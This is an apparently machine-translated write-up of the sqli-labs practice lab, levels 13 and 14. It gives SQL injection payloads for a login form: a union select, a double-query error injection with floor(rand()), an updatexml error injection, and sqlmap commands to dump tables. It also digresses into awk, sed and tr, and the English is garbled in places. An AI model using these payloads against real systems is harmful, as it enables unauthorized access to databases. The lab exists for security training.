sqlilabs less13

Manual and script

Obviously , Accurate error reporting gives us what we want .
Structure below SQL sentence

select * from table where uname = ('') and password = ('')

When querying the table, it is found that there is no return , Only successful login

1') union select 1,group_concat(table_name) from information_schema.tables where table_schema = database() #

When constructing statements, it seems that error injection can be used

1') union select count(*),concat((select table_name from information_schema.tables where table_schema=database()limit 0,1),floor(rand()*2))a from information_schema.tables group by a#
 By modifying the limit n,1 Of n To query different rows 

Because this double injection is random , It may take several times to succeed

The field name and data are the same , You can consider burp suite Or write a script .

Um. , To explain awk sed tr Work

awk -F Separator ( such as “ > ”) With > Separator , From the beginning to the first separator > by 1, From the first > To the second is 2…… {print$n} n It's No n individual 1 It's from the beginning to the first separator
tr a b It's a a Replace with b
sed ‘s/a/b/g’ s Is an alternative hold a Replace with b g yes s A mark in the replace command is used to replace all a, If not g Just replace the first a

‘s/(.*),/\1,/’ Will find the last , Replace empty Why?
because . Is to match a single character other than newline , , Add the following single characters

Is to repeat the previous match N Time or 0 Time Because the first time was , really Repeat it again , A single character after true , splendid Because of repetition N So , All the back （ Except for line breaks ） All can match

So we give . Parentheses indicate the beginning and end of the subexpression Because there is no limit, the match is all

Then if I'm (.*) After adding an English comma, it becomes the part with an English comma at the end of the match

Is it possible to replace the last English comma Try it on the computer ！

You can see that the English comma and all the characters before it are replaced , Because there is an English comma at the end of the first two lines, the whole line is replaced by an exclamation point , At the end of the third line is a string of characters, so only the English comma is replaced with an exclamation point . Why is that wrong . Think carefully , It matches the last English comma and all before it , What if I replace the matching with the matching ( Be careful \1 Will capture the first () Specified characters in \2 It's the second one () Internal )

Is the last English comma gone

Another example

Put the in brackets ab Plus the outside c That is to say abc（ Note that there is no g, So only replace the first abc） Replace with \1 The character in the first parenthesis quoted ab, Use \2 Well , Is to put the first abc Replace with c

It is recommended to do it yourself to strengthen understanding

Based on error

Prophase structure sql Statement typing database The accidental discovery of wrong time may also have error based injection

1') and updatexml(1,(concat(0x7c,(select group_concat(table_name) from information_schema.tables where table_schema=database()))),1)#

sqlmap

Grab the package first and then save it in a text file Use

sqlmap -r xx.txt

And then use -dbs 、-D database_name -tables and -D database_name -T table_name --dump

less-14

less14 and less13 Empathy sql The sentence has changed from English single quotation marks with parentheses to English double quotation marks